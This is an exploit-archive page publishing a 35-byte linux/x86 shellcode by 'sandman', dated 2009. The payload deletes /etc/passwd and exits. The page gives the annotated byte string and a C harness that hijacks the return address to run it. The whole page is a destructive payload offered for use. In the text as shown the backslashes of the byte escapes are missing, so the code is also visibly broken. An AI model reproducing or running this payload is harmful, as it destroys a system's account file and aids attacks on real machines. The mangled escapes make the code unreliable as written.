[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 unlink(/etc/passwd) & exit() 35 bytes
# Published : 2009-12-24
# Author : sandman
# Previous Title : win32/xp sp2 calc.exe 45 bytes
# Next Title : freebsd/x86 portbind shellcode 167 bytes
# Title: linux/x86 unlink(/etc/passwd) & exit() 35 bytes
# Date: 2009-12-24
# Author: sandman, n4mdn4s [4T] gmail [D0T] com
# Tested on: linux/Fedora 12
# Code :
/*
unlink_passwd.c
Platform: linux/x86
Size: 35 bytes
Author: $andman
*/
#include <string.h>
#include <stdio.h>
char shell[] = "xebx11" //jmp 8048073
"x5e" //pop %esi
"x31xc0" //xor %eax,%eax
"x31xc9" //xor %ecx,%ecx
"x31xd2" //xor %edx,%edx
"xb0x0a" //mov $0xa,%al
"x89xf3" //mov %esi,%ebx
"xcdx80" //int $0x80
"xb0x01" //mov $0x1,%al
"xcdx80" //int $0x80
"xe8xeaxffxffxff" //call 8048062
"x2f" //das
"x65" //gs
"x74x63" //je 80480df
"x2f" //das
"x70x61" //jo 80480e0
"x73x73" //jae 80480f4
"x77x64"; //ja 80480e7
int main()
{
printf("Shellcode Length: %dn",strlen(shell));
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shell;
}
//#$